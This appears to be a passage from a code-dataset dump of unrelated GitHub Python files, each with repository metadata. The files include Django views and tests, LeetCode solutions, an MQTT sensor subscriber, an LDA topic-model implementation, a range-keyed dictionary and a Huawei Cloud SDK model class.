            # Figure out where to redirect. If the user has change permission,
            # redirect to the change-list page for this object. Otherwise,
            # redirect to the admin index.
            if "_redirect" in request.POST:
                return request.POST["_redirect"]
            elif self.has_view_permission():
                change_list_url = self.model_admin_url('changelist')
                # Re-apply the filter/search querystring saved in the
                # session by the list view, so the user returns to the
                # same filtered page.
                if 'LIST_QUERY' in self.request.session \
                        and self.request.session['LIST_QUERY'][0] == self.model_info:
                    change_list_url += '?' + self.request.session['LIST_QUERY'][1]
                return change_list_url
            else:
                return self.get_admin_url('index')
class ModelFormAdminUtil(ModelFormAdminView):
    """Helper variant of the form view: prepares a form for an arbitrary
    instance without the usual request/permission workflow (presumably
    for reuse by other components - confirm callers)."""
    def init_request(self, obj=None):
        self.org_obj = obj
        self.prepare_form()
        self.instance_forms()
    @filter_hook
    def get_form_datas(self):
        # Only the instance is bound; the form is never bound to POST data.
        return {'instance': self.org_obj}
| [
"laomd@mail2.sysu.edu.cn"
] | laomd@mail2.sysu.edu.cn |
11e91c0a3ba0798110b22f64e090eb985d0159ed | 67eb4ece1499a6fa6695859cfd439fb08aec20d8 | /decimal_to_binary_converter.py | 9dc6bbabbf0eab8a98d8ecde8a3b4478b8f54a18 | [] | no_license | nurarenke/study | c823aa43ee25d1d4db653b546889d4c8b2e739a0 | e117ff4eb9d5c0195f5ba4ea9edfe42a3d8c3507 | refs/heads/master | 2021-09-07T19:31:02.534763 | 2018-02-27T22:53:41 | 2018-02-27T22:53:41 | 100,279,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | '''Convert a decimal to a binary number string
>>> dec_to_bin(6)
'110'
>>> dec_to_bin(4)
'100'
>>> dec_to_bin(3)
'11'
'''
def dec_to_bin(number):
    """Recursively convert a non-negative integer to its binary string.

    Uses floor division so the recursion is correct on both Python 2 and
    Python 3: the original ``number/2`` becomes float division under
    Python 3 and corrupts the result.
    """
    if number < 2:
        # Base case: 0 and 1 are their own binary digits.
        return str(number)
    # Most-significant bits first, then the current low-order bit.
    return dec_to_bin(number // 2) + dec_to_bin(number % 2)
if __name__ == '__main__':
    import doctest
    # Run the module docstring's doctests.  The call form of print works
    # on both Python 2 and 3; the original `print "..."` statement form
    # is a SyntaxError under Python 3.
    if doctest.testmod().failed == 0:
        print("\n*** ALL TEST PASSED!\n")
"nurarenke@gmail.com"
] | nurarenke@gmail.com |
cf7330a35aacb57aecc3cf237fab0a5660c9e136 | 7a550d2268bc4bc7e2fec608ffb1db4b2e5e94a0 | /1101-1200/1155-Number of Dice Rolls With Target Sum/1155-Number of Dice Rolls With Target Sum.py | f54e16cb49f5483bfd0bcd1a41d19b792bf96035 | [
"MIT"
] | permissive | jiadaizhao/LeetCode | be31bd0db50cc6835d9c9eff8e0175747098afc6 | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | refs/heads/master | 2021-11-05T04:38:47.252590 | 2021-10-31T09:54:53 | 2021-10-31T09:54:53 | 99,655,604 | 52 | 28 | MIT | 2020-10-02T12:47:47 | 2017-08-08T05:57:26 | C++ | UTF-8 | Python | false | false | 863 | py | class Solution:
def numRollsToTarget(self, d: int, f: int, target: int) -> int:
dp = [[0] * (1 + target) for _ in range(1 + d)]
dp[0][0] = 1
MOD = 10 ** 9 + 7
for i in range(1, 1 + d):
for j in range(1, 1 + target):
for k in range(1, 1 + min(f, j)):
dp[i][j] = (dp[i][j] + dp[i - 1][j - k]) % MOD
return dp[d][target]
class Solution2:
    """Space-optimized variant: keeps only the previous DP row."""
    def numRollsToTarget(self, d: int, f: int, target: int) -> int:
        MOD = 10 ** 9 + 7
        prev = [0] * (target + 1)
        prev[0] = 1  # zero dice reach sum 0 in exactly one way
        for _ in range(d):
            cur = [0] * (target + 1)
            for total in range(1, target + 1):
                # All terms are < MOD, so summing before reducing yields
                # the same residue as reducing after each addition.
                cur[total] = sum(prev[total - face]
                                 for face in range(1, min(f, total) + 1)) % MOD
            prev = cur
        return prev[target]
| [
"jiadaizhao@gmail.com"
] | jiadaizhao@gmail.com |
d200a1190b29b3a794c7e475966f760236ea799b | d3b362cc1339404ad0ae0ba1a1ca9a476a15dd66 | /user_profile/urls.py | 99398603b705c8c34a6f0fe7247dda887254b0ae | [
"MIT"
] | permissive | bitsnbytes7c8/django-site | 28e4e36b0846619aedf7bd37a7d17cfa88915852 | 1872974e8b578c971c60cc30c71a186e518ab801 | refs/heads/master | 2016-08-11T20:49:03.344384 | 2015-10-17T21:54:52 | 2015-10-17T21:54:52 | 44,455,598 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | from django.conf.urls import include, url
from django.contrib import admin
from . import views
urlpatterns = [
    # Profile creation form.
    url(r'^create/$', views.create_profile),
    # The logged-in user's own profile.
    url(r'^view/$', views.view_profile),
    # NOTE(review): 'edit' is wired to the same view as 'create' -
    # presumably create_profile doubles as the edit form; confirm.
    url(r'^edit/$', views.create_profile),
    # Another user's profile, looked up by username.
    url(r'^view/(?P<username>[\w]+)/$', views.view_profile),
]
| [
"arjun.sn7c8@gmail.com"
] | arjun.sn7c8@gmail.com |
3db48a52f7eb63de746fb61792b5e142cdfc575d | 7f0e409b5c88f77624b3b41928181f9728e0e0ae | /1-List/53_maxSubArray.py | 9891922537c590f73059e22baa7e13ead57f0439 | [] | no_license | yangml6/LeetCode | e6f15d54dbcadbefe5f57439ee70a4075b7aaf8b | 1c487e09a0428bfeaf63ea8142a545090e2514f5 | refs/heads/master | 2021-05-15T20:58:39.025323 | 2018-11-28T02:56:02 | 2018-11-28T02:56:02 | 107,920,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,793 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 25 16:09:01 2017
@author: yml
"""
#求数组中连续子序列和的最大值
class Solution(object):
    """LeetCode 53: maximum sum over all non-empty contiguous subarrays.

    The original file also carried a commented-out O(n^2) attempt that
    had been rejected for time limit exceeded; it is removed as dead code.
    """
    def maxSubArray(self, nums):
        """Kadane's algorithm: O(n) time, O(1) extra space.

        :type nums: List[int]  (assumed non-empty, per the problem)
        :rtype: int
        """
        # Best sum of a subarray ending at the current index, and the
        # best sum seen anywhere so far.
        best_ending_here = best_overall = nums[0]
        for n in nums[1:]:
            # Either extend the running subarray or start fresh at n.
            best_ending_here = max(n, best_ending_here + n)
            best_overall = max(best_overall, best_ending_here)
        return best_overall
if __name__ == '__main__':
    # Smoke-test the solver on the classic LeetCode example plus short
    # edge cases.  (The original embedded a multi-hundred-element literal
    # that is corrupted in this copy of the file - it was split mid-token
    # and would not parse - so it is replaced by a compact driver.)
    s = Solution()
    cases = [
        [-2, 1, -3, 4, -1, 2, 1, -5, 4],   # expected 6
        [1, -2, 1],                        # expected 1
        [-2, 1],                           # expected 1
    ]
    for nums in cases:
        print(s.maxSubArray(nums))
"1952902819@qq.com"
] | 1952902819@qq.com |
16fcef6d63c434eacc476bc731df2f54419cd95e | a34739090209bf3b93563f95ba4f8da6a877dd22 | /DHT11/Subscribe.py | 480f58cb7b62541702d5fe9bb11621340d4e8809 | [] | no_license | nam2297ptit/DoAnThietKeHeThongNhung | 1048aa220fb55e6bea92c3373291095a39c5630f | 6cdacf87adecdfb1827b6cc56fbb23cca81c0244 | refs/heads/master | 2020-04-28T23:39:51.516526 | 2019-05-13T10:10:21 | 2019-05-13T10:10:21 | 175,664,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,633 | py | import paho.mqtt.client as mqtt
from Get_Data_to_DB import Sensor
# The callback for when the client receives a CONNACK response from the server.
#====================================================
# MQTT Settings
MQTT_Broker = "localhost"
MQTT_Port = 1883
Keep_Alive_Interval = 45           # seconds between keep-alive pings
MQTT_Topic = "home/sensors/#"      # wildcard: every sensor under home/

# Connect MQTT broker
def on_connect(client, userdata, flags, rc):
    """CONNACK callback: rc == 0 means the broker accepted the connection.

    (The original had a redundant `pass` before the failure message.)
    """
    if rc != 0:
        print("Unable to connect to MQTT Broker...")
    else:
        print("Connected with MQTT Broker: " + str(MQTT_Broker))
        # Subscribing in on_connect() means that if we lose the connection
        # and reconnect then subscriptions will be renewed.
        client.subscribe(MQTT_Topic, 0)
# The callback for when a PUBLISH message is received from the server.
def on_message(client, userdata, msg):
    """PUBLISH callback: log the message and persist it via Sensor().

    Any failure while saving is reported but must not kill the MQTT loop.
    """
    # This is the Master Call for saving MQTT Data into DB
    # For details of "sensor_Data_Handler" function please refer "sensor_data_to_db.py"
    print("MQTT Data Received...")
    print("MQTT Topic: " + msg.topic)
    print("Data: " + str(msg.payload))
    try:
        Sensor(msg.payload)
    except Exception:
        # The original bare `except:` also trapped SystemExit and
        # KeyboardInterrupt; Exception keeps Ctrl-C working.
        print("Error insert database!!")
    print("-------------------")
client = mqtt.Client()
#client.username_pw_set(username="sammy",password="123456")
# Wire up the lifecycle callbacks before connecting.
client.on_connect = on_connect
client.on_message = on_message
client.connect(MQTT_Broker,MQTT_Port, Keep_Alive_Interval)
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
client.loop_forever()
"namunjted1234@gmail.com"
] | namunjted1234@gmail.com |
efc48cf55cecc69f2b9a01cbc950890c053e3a77 | 31bc3fdc7c2b62880f84e50893c8e3d0dfb66fa6 | /libraries/numpy/python_369/python_369/numpy_118/built_in_scalars/uint_.py | 31601e10986c1a268eb3ab8a0b088f9f95f7615e | [] | no_license | tpt5cu/python-tutorial | 6e25cf0b346b8182ebc8a921efb25db65f16c144 | 5998e86165a52889faf14133b5b0d7588d637be1 | refs/heads/master | 2022-11-28T16:58:51.648259 | 2020-07-23T02:20:37 | 2020-07-23T02:20:37 | 269,521,394 | 0 | 0 | null | 2020-06-05T03:23:51 | 2020-06-05T03:23:50 | null | UTF-8 | Python | false | false | 1,496 | py | # https://numpy.org/doc/1.18/reference/arrays.scalars.html#built-in-scalar-types
import numpy as np
def what_is_uint():
    '''
    - "np.uint" and "np.uintc" are aliases for real underlying NumPy scalar types
    - The values of those aliases depend on the operating system
    - On my system, "np.uint" creates an object whose class is "numpy.uint64"
    - "np.uint" has the same precision as ... ?
    - On my system, "np.uintc" creates an object whose class is "numpy.uint32"
    - "np.uintc" has the same precision as ... ?
    - If I want some size other than those specified by the aliases, I'll have to use a class with an explicit size, e.g. np.uint8
    '''
    # NOTE: the printed results below are platform-dependent (the alias
    # targets vary by OS/compiler); the inline answers reflect the
    # author's machine only.
    print(np.uint is np.uint64) # True
    print(np.uintc is np.uint32) # True
    # No error because 1 certainly fits within the size of a C long
    ary = np.array(1, dtype=np.uint)
    print(ary.dtype) # uint64
    #print(int(10**50)) # 100000000000000000000000000000000000000000000000000
    #np.array(10**50, dtype=np.uint) # OverflowError: Python int too large to convert to C long
    print(type(np.uint)) # <class 'type'>
    scalar = np.uint(10)
    print(type(scalar)) # <class 'numpy.uint64'>
    scalar = np.uint32(10)
    print(type(scalar)) # <class 'numpy.uint32'>
    scalar = np.uintc(10)
    print(type(scalar)) # <class 'numpy.uint32'>
    scalar = np.uint8(4)
    print(type(scalar)) # <class 'numpy.uint8'>
if __name__ == '__main__':
    what_is_uint()
| [
"uif93194@gmail.com"
] | uif93194@gmail.com |
247a9f709b4b7ea2e7a3f3f4a81ac637e230a66e | e9b740947aa14c9660505e64cdaa8a4ff1e2e322 | /eventex/subscriptions/tests/test_form_subscription.py | 18e821d5ec893bb34515f206c0cdeb0bbefb186e | [] | no_license | Leonardoperrella/eventex | 9dea1cb90acb9d32cd7dbaca16b5521eace48ea7 | e38f220876cb10fb75d4d4d3b073bca0c70d5669 | refs/heads/master | 2021-08-17T03:07:13.297640 | 2019-08-26T19:16:49 | 2019-08-26T19:16:49 | 145,333,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,238 | py | from django.test import TestCase
from eventex.subscriptions.forms import SubscriptionForm
class SubscriptionFormTest(TestCase):
    """Unit tests for SubscriptionForm's fields and cleaning rules."""
    def test_form_has_fields(self):
        """Form must have 4 fields."""
        form = SubscriptionForm()
        expected = ['name', 'cpf', 'email', 'phone']
        self.assertSequenceEqual(expected, list(form.fields))
    def test_cpf_is_digit(self):
        """Cpf must only accept digits"""
        form = self.make_validated_form(cpf='ABCD5678901')
        self.assertFormErrorCode(form, 'cpf', 'digits')
    def test_cpf_has_11_digits(self):
        """cpf must have 11 digits"""
        form = self.make_validated_form(cpf='1234')
        self.assertFormErrorCode(form, 'cpf', 'length')
    def test_must_be_capitalize(self):
        """Name must be captalize"""
        #LEONARDO perrella -> Leonardo Perrella
        form = self.make_validated_form(name='LEONARDO perrella')
        self.assertEqual('Leonardo Perrella', form.cleaned_data['name'])
    def test_email_is_optional(self):
        """Email is optional"""
        form = self.make_validated_form(email='')
        self.assertFalse(form.errors)
    def test_must_inform_email_or_phone(self):
        """Email and Phone are optional, but one must be informed"""
        form = self.make_validated_form(email='', phone='')
        # Cross-field validation errors land under the non-field key.
        self.assertListEqual(['__all__'], list(form.errors))
    def test_phone_is_optional(self):
        """Phone is optional"""
        form = self.make_validated_form(phone='')
        self.assertFalse(form.errors)
    # --- helpers ---------------------------------------------------------
    def assertFormErrorCode(self, form, field, code):
        # Compare the machine-readable code of the first ValidationError
        # recorded for `field`.
        errors = form.errors.as_data()
        errors_list = errors[field]
        exception = errors_list[0]
        self.assertEqual(code, exception.code)
    def assertFormErrorMessage(self, form, field, msg):
        # NOTE(review): not used by the tests above - kept for
        # message-based assertions.
        errors = form.errors
        errors_list = errors[field]
        self.assertListEqual([msg], errors_list)
    def make_validated_form(self, **kwargs):
        # Build a form from valid defaults overridden by kwargs and run
        # full validation so cleaned_data / errors are populated.
        valid = dict(name='Leonardo Perrella', cpf='12345678901',
                     email='leo@leo.com.br', phone='31-9994449494')
        data = dict(valid, **kwargs)
        form = SubscriptionForm(data)
        form.is_valid()
        return form
"leonardo.perrella@yahoo.com.br"
] | leonardo.perrella@yahoo.com.br |
2d192a9d9291492a2911fb5ad35382030baf8fc5 | fad34b6b81e93850e6f408bbc24b3070e002997d | /Python-DM-Text Mining-01.py | e4b51fba0851281217136c06054f5f0570c357bf | [] | no_license | Sandy4321/Latent-Dirichlet-Allocation-2 | d60c14a3abb62e05a31aaac8c9a6d9381ec9d560 | 0bf6670643c7968064e375a287448b515b077473 | refs/heads/master | 2021-05-05T09:57:17.304046 | 2017-07-26T16:14:22 | 2017-07-26T16:14:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,149 | py | ############################################################################
# Created by: Prof. Valdecy Pereira, D.Sc.
# UFF - Universidade Federal Fluminense (Brazil)
# email: valdecy.pereira@gmail.com
# Course: Data Mining
# Lesson: Text Mining
# Citation:
# PEREIRA, V. (2017). Project: LDA - Latent Dirichlet Allocation, File: Python-DM-Text Mining-01.py, GitHub repository:
# <https://github.com/Valdecy/Latent-Dirichlet-Allocation>
############################################################################
# Installing Required Libraries
import numpy as np
import pandas as pd
from nltk.tokenize import RegexpTokenizer
from random import randint
# Function: lda_tm
def lda_tm(document = None, K = 2, alpha = 0.12, eta = 0.01, iterations = 5000, dtm_matrix = False, dtm_bin_matrix = False, dtm_tf_matrix = False, dtm_tfidf_matrix = False, co_occurrence_matrix = False, correl_matrix = False):
    """Collapsed-Gibbs LDA over a list of raw text documents.

    document   -- list of raw text strings (lower-cased, tokenised on word chars)
    K          -- number of topics
    alpha, eta -- Dirichlet priors (document-topic, topic-word)
    iterations -- Gibbs sweeps (the loop performs iterations + 1 sweeps,
                  preserved from the original)
    *_matrix   -- when True, append the corresponding DataFrame to the result

    Returns a list holding the requested optional matrices (dtm, dtm_bin,
    dtm_tf, dtm_tfidf, co-occurrence, correlation - in that order),
    followed by theta (document-topic proportions, ndarray) and phi
    (word-topic proportions, DataFrame indexed by word).

    Fixes vs. the original implementation:
      * `document` no longer uses a shared mutable default argument;
      * dtm_tf is also computed when only dtm_tfidf_matrix is requested
        (the original raised NameError in that case);
      * the Gibbs eta-smoothing denominator uses the vocabulary size
        instead of the number of documents;
      * theta rows are normalised with their pre-normalisation sums.
    """
    ################ Part 1 - Start of Function #############################
    if document is None:
        document = []
    tokenizer = RegexpTokenizer(r'\w+')
    result_list = []
    # Corpus: one token list per document.
    corpus = []
    for i in document:
        tokens = tokenizer.tokenize(i.lower())
        corpus.append(tokens)
    # Corpus ID: same shape as corpus; tokens replaced by vocab indices below.
    corpus_id = []
    for i in document:
        tokens = tokenizer.tokenize(i.lower())
        corpus_id.append(tokens)
    # Unique Words (vocabulary, in order of first appearance)
    uniqueWords = []
    for j in range(0, len(corpus)):
        for i in corpus[j]:
            if not i in uniqueWords:
                uniqueWords.append(i)
    # Corpus ID for Unique Words
    for j in range(0, len(corpus)):
        for i in range(0, len(uniqueWords)):
            for k in range(0, len(corpus[j])):
                if uniqueWords[i] == corpus[j][k]:
                    corpus_id[j][k] = i
    # Topic Assignment: same shape as corpus; filled with random topics below.
    topic_assignment = []
    for i in document:
        tokens = tokenizer.tokenize(i.lower())
        topic_assignment.append(tokens)
    # dtm (document-term counts) - input of every optional matrix below.
    if dtm_matrix == True or dtm_bin_matrix == True or dtm_tf_matrix == True or dtm_tfidf_matrix == True or co_occurrence_matrix == True or correl_matrix == True:
        dtm = np.zeros(shape = (len(corpus), len(uniqueWords)))
        for j in range(0, len(corpus)):
            for i in range(0, len(uniqueWords)):
                for k in range(0, len(corpus[j])):
                    if uniqueWords[i] == corpus[j][k]:
                        dtm[j][i] = dtm[j][i] + 1
        dtm_pd = pd.DataFrame(dtm, columns = uniqueWords)
        if dtm_matrix == True:
            result_list.append(dtm_pd)
    # dtm_bin (binary presence/absence)
    if dtm_bin_matrix == True or co_occurrence_matrix == True or correl_matrix == True:
        dtm_bin = np.zeros(shape = (len(corpus), len(uniqueWords)))
        for i in range(0, len(corpus)):
            for j in range(0, len(uniqueWords)):
                if dtm[i,j] > 0:
                    dtm_bin[i,j] = 1
        dtm_bin_pd = pd.DataFrame(dtm_bin, columns = uniqueWords)
        if dtm_bin_matrix == True:
            result_list.append(dtm_bin_pd)
    # dtm_tf (term frequency) - also an input of dtm_tfidf, so it is built
    # whenever either flag is set (the original only built it when
    # dtm_tf_matrix was True and crashed with NameError on tfidf-only calls).
    if dtm_tf_matrix == True or dtm_tfidf_matrix == True:
        dtm_tf = np.zeros(shape = (len(corpus), len(uniqueWords)))
        for i in range(0, len(corpus)):
            for j in range(0, len(uniqueWords)):
                if dtm[i,j] > 0:
                    dtm_tf[i,j] = dtm[i,j]/dtm[i,].sum()
        if dtm_tf_matrix == True:
            dtm_tf_pd = pd.DataFrame(dtm_tf, columns = uniqueWords)
            result_list.append(dtm_tf_pd)
    # dtm_tfidf
    if dtm_tfidf_matrix == True:
        idf = np.zeros(shape = (1, len(uniqueWords)))
        for i in range(0, len(uniqueWords)):
            idf[0,i] = np.log10(dtm.shape[0]/(dtm[:,i]>0).sum())
        dtm_tfidf = np.zeros(shape = (len(corpus), len(uniqueWords)))
        for i in range(0, len(corpus)):
            for j in range(0, len(uniqueWords)):
                dtm_tfidf[i,j] = dtm_tf[i,j]*idf[0,j]
        dtm_tfidf_pd = pd.DataFrame(dtm_tfidf, columns = uniqueWords)
        result_list.append(dtm_tfidf_pd)
    # Co-occurrence Matrix (word-by-word document co-occurrence counts)
    if co_occurrence_matrix == True:
        co_occurrence = np.dot(dtm_bin.T,dtm_bin)
        co_occurrence_pd = pd.DataFrame(co_occurrence, columns = uniqueWords, index = uniqueWords)
        result_list.append(co_occurrence_pd)
    # Correlation Matrix (upper triangle only, as in the original)
    if correl_matrix == True:
        correl = np.zeros(shape = (len(uniqueWords), len(uniqueWords)))
        for i in range(0, correl.shape[0]):
            for j in range(i, correl.shape[1]):
                correl[i,j] = np.corrcoef(dtm_bin[:,i], dtm_bin[:,j])[0,1]
        correl_pd = pd.DataFrame(correl, columns = uniqueWords, index = uniqueWords)
        result_list.append(correl_pd)
    # LDA Initialization: random topic per token, then the count matrices.
    for i in range(0, len(topic_assignment)):
        for j in range(0, len(topic_assignment[i])):
            topic_assignment[i][j] = randint(0, K-1)
    # cdt[d, k] = number of tokens of document d assigned to topic k
    cdt = np.zeros(shape = (len(topic_assignment), K))
    for i in range(0, len(topic_assignment)):
        for j in range(0, len(topic_assignment[i])):
            for m in range(0, K):
                if topic_assignment[i][j] == m:
                    cdt[i][m] = cdt[i][m] + 1
    # cwt[k, w] = occurrences of vocabulary word w assigned to topic k
    cwt = np.zeros(shape = (K, len(uniqueWords)))
    for i in range(0, len(corpus)):
        for j in range(0, len(uniqueWords)):
            for m in range(0, len(corpus[i])):
                if uniqueWords[j] == corpus[i][m]:
                    for n in range(0, K):
                        if topic_assignment[i][m] == n:
                            cwt[n][j] = cwt[n][j] + 1
    # LDA Algorithm (collapsed Gibbs sampling)
    for i in range(0, iterations + 1):
        for d in range(0, len(corpus)):
            for w in range(0, len(corpus[d])):
                initial_t = topic_assignment[d][w]
                word_num = corpus_id[d][w]
                # Remove this token's current assignment from the counts.
                cdt[d,initial_t] = cdt[d,initial_t] - 1
                cwt[initial_t,word_num] = cwt[initial_t,word_num] - 1
                # Full conditional p(z | rest).  The eta-smoothing
                # denominator must use the vocabulary size V (the
                # original wrongly used the number of documents).
                p_z = ((cwt[:,word_num] + eta) / (np.sum((cwt), axis = 1) + len(uniqueWords) * eta)) * ((cdt[d,] + alpha) / (sum(cdt[d,]) + K * alpha ))
                z = np.sum(p_z)
                p_z_ac = np.add.accumulate(p_z/z)
                # Sample the new topic by inverse CDF on the normalised p_z.
                u = np.random.random_sample()
                for m in range(0, K):
                    if u <= p_z_ac[m]:
                        final_t = m
                        break
                topic_assignment[d][w] = final_t
                cdt[d,final_t] = cdt[d,final_t] + 1
                cwt[final_t,word_num] = cwt[final_t,word_num] + 1
        if i % 100 == 0:
            print('iteration:', i)
    # theta: per-document topic proportions.  Row sums are computed once
    # before normalising; the original recomputed np.sum inside the loop
    # and divided later entries by a partially normalised row total.
    theta = (cdt + alpha)
    d_theta = np.sum(theta, axis = 1)
    for i in range(0, len(theta)):
        for j in range(0, K):
            theta[i,j] = theta[i,j]/d_theta[i]
    result_list.append(theta)
    # phi: per-topic word proportions (already normalised correctly).
    phi = (cwt + eta)
    d_phi = np.sum(phi, axis = 1)
    for i in range(0, K):
        for j in range(0, len(phi.T)):
            phi[i,j] = phi[i,j]/d_phi[i]
    phi_pd = pd.DataFrame(phi.T, index = uniqueWords)
    result_list.append(phi_pd)
    return result_list
############### End of Function ##############
######################## Part 2 - Usage ####################################
# Documents
doc_1 = "data mining technique data mining first favourite technique"
doc_2 = "data mining technique data mining second favourite technique"
doc_3 = "data mining technique data mining third favourite technique"
doc_4 = "data mining technique data mining fourth favourite technique"
doc_5 = "friday play guitar"
doc_6 = "saturday will play guitar"
doc_7 = "sunday will play guitar"
doc_8 = "monday will play guitar"
doc_9 = "good good indeed can thank"
# Compile Documents
docs = [doc_1, doc_2, doc_3, doc_4, doc_5, doc_6, doc_7, doc_8, doc_9]
# Call Function
# Gibbs sampling is stochastic (no seed is set), so exact theta/phi
# values differ between runs.
lda = lda_tm(document = docs, K = 3, alpha = 0.12, eta = 0.01, iterations = 2500, co_occurrence_matrix = True)
########################## End of Code #####################################
| [
"noreply@github.com"
] | Sandy4321.noreply@github.com |
d218fdb3fc55db678f6cdfbaae28ee4a588c899b | 205002cac7cfc03298f76ec6d053181400b2abe5 | /src/rangeddict.py | 8988d7ac3d77f346e02b7882457c588006acf989 | [
"MIT"
] | permissive | GovernorGecko/RangedDict | 1539e0b5ab26b9330c0d431e5f484123e157c11b | 7eb34fc2e682758184a495d23db9bc096b0b288d | refs/heads/main | 2023-06-04T03:35:12.187413 | 2021-06-15T19:38:49 | 2021-06-15T19:38:49 | 377,248,839 | 0 | 0 | MIT | 2021-06-15T19:38:50 | 2021-06-15T17:48:33 | null | UTF-8 | Python | false | false | 2,323 | py | """
rangeddict.py
"""
from .RedBlackTree.src.redblacktree import RedBlackTree
class RangedDict(RedBlackTree):
    """
    Dictionary keyed by numeric ranges, implemented on a red-black tree.
    Keys are stored as (low, high) tuples; lookups accept either a tuple
    key or a single int/float that falls inside a stored range.
    """
    # Allowed types for range endpoints and scalar lookup keys.
    __valid_instances = (int, float)
    __slots__ = []
    def __init__(self):
        # Hand the tree our comparison / equality / validation callbacks
        # so its insert and find operations understand range keys.
        super(RangedDict, self).__init__(
            self.__ranged_dict_comparator,
            self.__ranged_dict_equals,
            self.__ranged_dict_validator
        )
    def __getitem__(self, key):
        """
        Return the first stored value of the range containing `key`.
        parameters:
            int
        returns:
            var
        NOTE(review): when no stored range matches, find_node presumably
        returns (None, ...) and this raises AttributeError rather than
        KeyError - confirm against RedBlackTree.find_node.
        """
        node, _ = self.find_node(key)
        return node._values[0]
    def __ranged_dict_comparator(self, key_one, key_two):
        """
        < or >
        Orders range keys; raises on overlapping ranges so stored ranges
        stay disjoint.
        parameters:
            tuple, int, or float
            tuple, int, or float
        returns
            bool or None
        """
        if isinstance(key_one, tuple):
            if key_one[1] < key_two[0]:
                return True
            elif key_one[0] > key_two[1]:
                return False
            else:
                # Neither strictly before nor after: the ranges overlap.
                raise Exception(
                    f"Overlap! {key_one} already exists in some form!"
                )
        elif isinstance(key_one, self.__valid_instances):
            if key_one < key_two[0]:
                return True
            return False
        # Unsupported key type: signal "no ordering" to the tree.
        return None
    def __ranged_dict_equals(self, key_one, key_two):
        """
        =
        A scalar equals a range when it lies inside it; a tuple equals
        only an identical tuple.
        parameters:
            tuple, int, or float
            tuple, int, or float
        returns:
            bool or None
        """
        if (
            isinstance(key_one, self.__valid_instances) and
            key_one >= key_two[0] and key_one <= key_two[1]
        ):
            return True
        elif isinstance(key_one, tuple) and key_one == key_two:
            return True
        return False
    def __ranged_dict_validator(self, key):
        """
        Valid key data?
        parameters:
            tuple
        returns:
            bool
        Returns if the given key is valid for our RBTree: a tuple whose
        elements are all int/float.
        """
        if isinstance(key, tuple):
            for k in key:
                if not isinstance(k, self.__valid_instances):
                    return False
            return True
        return False
| [
"john.lee.bunting@gmail.com"
] | john.lee.bunting@gmail.com |
c529c1ac4b3054de2460b7efedd3156896fc9f18 | d74758b5342359c607c3ed668b9334bb9f2b7f3c | /products/models.py | 8c44be24b5f226a43f14cad5e6d4716ae32899d3 | [] | no_license | Cha-K28/msp4-cking-full-stack-django | 30b0febfdaa439039b39582a6c472abdb67144d7 | ab90ff317ff925dfa63321187afcc385c8aebe8f | refs/heads/master | 2023-03-05T01:34:07.461291 | 2021-02-14T02:29:46 | 2021-02-14T02:29:46 | 331,568,899 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | from django.db import models
# Create your models here.
class Product(models.Model):
    """Catalogue item for the store.

    NOTE(review): the fields (author/subject/year/grade) suggest study
    materials such as books or past papers - confirm the domain.
    """
    name = models.TextField()
    # NOTE(review): max_length on a TextField is not enforced at the
    # database level by Django (forms only) - CharField would enforce it.
    author = models.TextField(max_length=254)
    subject = models.TextField(max_length=254)
    # Optional; max_digits=6 / decimal_places=2 allows values up to 9999.99.
    rating = models.DecimalField(max_digits=6, decimal_places=2,
                                 null=True, blank=True)
    price = models.DecimalField(max_digits=6, decimal_places=2)
    year = models.CharField(max_length=254, null=True, blank=True)
    image = models.ImageField(null=True, blank=True)
    grade = models.CharField(max_length=254, null=True, blank=True)
    def __str__(self):
        # Human-readable label used by the admin and shell.
        return self.name
| [
"charlie@cartell.ie"
] | charlie@cartell.ie |
3e30a6a777fc7d9632db4589647703d42784d301 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-dgc/huaweicloudsdkdgc/v1/model/real_time_node_status.py | 7221161869b508adcbdee1530355437f7d8e3e9e | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,485 | py | # coding: utf-8
import re
import six
class RealTimeNodeStatus:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'name': 'str',
'status': 'str',
'log_path': 'str',
'node_type': 'str'
}
attribute_map = {
'name': 'name',
'status': 'status',
'log_path': 'logPath',
'node_type': 'nodeType'
}
def __init__(self, name=None, status=None, log_path=None, node_type=None):
"""RealTimeNodeStatus - a model defined in huaweicloud sdk"""
self._name = None
self._status = None
self._log_path = None
self._node_type = None
self.discriminator = None
if name is not None:
self.name = name
if status is not None:
self.status = status
if log_path is not None:
self.log_path = log_path
if node_type is not None:
self.node_type = node_type
@property
def name(self):
"""Gets the name of this RealTimeNodeStatus.
:return: The name of this RealTimeNodeStatus.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this RealTimeNodeStatus.
:param name: The name of this RealTimeNodeStatus.
:type: str
"""
self._name = name
@property
def status(self):
"""Gets the status of this RealTimeNodeStatus.
:return: The status of this RealTimeNodeStatus.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this RealTimeNodeStatus.
:param status: The status of this RealTimeNodeStatus.
:type: str
"""
self._status = status
@property
def log_path(self):
"""Gets the log_path of this RealTimeNodeStatus.
:return: The log_path of this RealTimeNodeStatus.
:rtype: str
"""
return self._log_path
@log_path.setter
def log_path(self, log_path):
"""Sets the log_path of this RealTimeNodeStatus.
:param log_path: The log_path of this RealTimeNodeStatus.
:type: str
"""
self._log_path = log_path
@property
def node_type(self):
